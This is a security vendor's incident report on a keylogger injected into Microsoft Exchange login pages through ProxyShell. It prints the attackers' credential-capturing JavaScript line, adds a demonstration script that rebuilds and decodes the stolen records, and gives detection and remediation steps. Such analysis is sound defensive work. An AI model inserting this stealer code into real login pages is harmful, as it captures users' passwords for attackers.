Positive Technologies detects a series of attacks via Microsoft Exchange Server

While responding to an incident, the Incident Response team of Positive Technologies Expert Security Center (PT ESC) discovered a previously unknown keylogger embedded in the login page (logon.aspx) of one of our customers' Microsoft Exchange servers. The keylogger captured the account credentials entered on that page and collected them into a file that could be fetched from the internet via a specific path. The team identified over 30 victims, most of them government agencies in various countries. According to our data, the first compromise occurred in 2021. Without additional data we cannot attribute these attacks to a specific group; most of the victims, however, are located in Africa and the Middle East.

Attack scenario

To plant the stealer, the attackers exploited ProxyShell, a known chain of Microsoft Exchange Server vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207) that gives an unauthenticated attacker code execution on the server. They then added the keylogger code to the server's login page.

This is the line the attackers added to the login page, inside the clkLgn() handler that runs when the user submits the logon form. It takes the current time, the user name and the password from the form fields, joins them with tab characters, escapes the result and appends a random uin parameter to the resulting parameter string:

    var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Here's how it looks on the login page:

Figure 1. Code of the compromised Microsoft Exchange server main page
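The injected line produces one URL-encoded record per logon attempt. The following JavaScript is an added example, not code from the original post or from the attackers' implant: it reproduces the injected expression with constructed form values and then decodes a record back into its three fields, which is what a responder has to do when reading the attacker's collection file. The stub for OWA's gbid() helper (a lookup into a plain object rather than document.getElementById), the curTime string and the sample user name and password are all assumptions made for the demonstration.

```javascript
// Added example, not code from the original post or the implant. Reproduces the
// injected expression with constructed inputs, then decodes the record.
// Assumptions: OWA's gbid() helper is stubbed as a lookup into a plain object
// (on the real page it resolves an element by id), and curTime is passed in.

// Constructed stand-in for the OWA logon form fields.
const logonForm = {
  username: { value: "j.doe@example.test" },
  password: { value: "P@ss word#1+x" },
};

// Stub for OWA's gbid() ("get by id").
function gbid(id) {
  return logonForm[id];
}

// What the injected line computes inside clkLgn(): time, user name and
// password joined by tabs, passed through escape(), plus a random uin that
// only serves as a cache-buster. escape() encodes tab as %09 and space as %20
// but leaves @ . + - _ * / alone, so "+" survives unchanged and must not be
// treated as a space when decoding.
function buildObjectData(curTime) {
  return "ObjectType=" +
    escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) +
    "&uin=" + Math.random().toString(16).substring(2);
}

// Decodes one collected record back into its fields. Only the ObjectType
// parameter carries data. escape() encodes "&", "=" and "\t" inside the value,
// so splitting on "&" first and on tab afterwards cannot be confused by the
// user's input.
function parseObjectData(objectData) {
  const part = objectData.split("&").find((p) => p.startsWith("ObjectType="));
  if (part === undefined) {
    throw new Error("not a keylogger record: missing ObjectType parameter");
  }
  const [time, username, password] =
    unescape(part.slice("ObjectType=".length)).split("\t");
  return { time, username, password };
}

// Round trip with a constructed timestamp.
const record = buildObjectData("2024-05-22 10:15:01");
console.log(record);
console.log(parseObjectData(record));
```

parseObjectData() deliberately uses unescape() rather than decodeURIComponent() or URLSearchParams, because the implant encodes with escape(): a password containing "+" or a non-ASCII character would otherwise be decoded wrongly.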

In the same logon.aspx file, the attackers also added server-side code that receives what the stealer collects and writes the credentials to a file under a path that can be requested from the internet.

Figure 2. Code of the compromised logon.aspx file

As a result of the code shown in Figure 2, the attackers obtained the following user credentials:

Figure 3. Stolen credentials

Victims

We have identified over 30 victims, predominantly government agencies from various countries. The list of victims also includes banks, IT companies, and educational institutions. The countries affected by these attacks include Russia, the UAE, Kuwait, Oman, Niger, Nigeria, Ethiopia, Mauritius, Jordan, and Lebanon. All victims have been notified of the breach.

Recommendations

You can check for compromise by searching the login page of your Microsoft Exchange server (logon.aspx) for the stealer code shown in Figure 1; the literals "ObjectType=" and "&uin=" are distinctive, but an attacker can easily change them, so a negative search is not proof of a clean server. If your server has been compromised, locate the collection file (its path is in the server-side code added to logon.aspx, see Figure 2), work out which accounts' credentials were recorded, reset those passwords and delete the file. Remove the injected code, or restore logon.aspx from a known-good copy, and make sure you are running the latest Microsoft Exchange Server cumulative update with all pending security updates installed: the ProxyShell vulnerabilities used for the initial access were patched in 2021.

If necessary, PT Expert Security Center specialists are ready to assist you with the investigation.
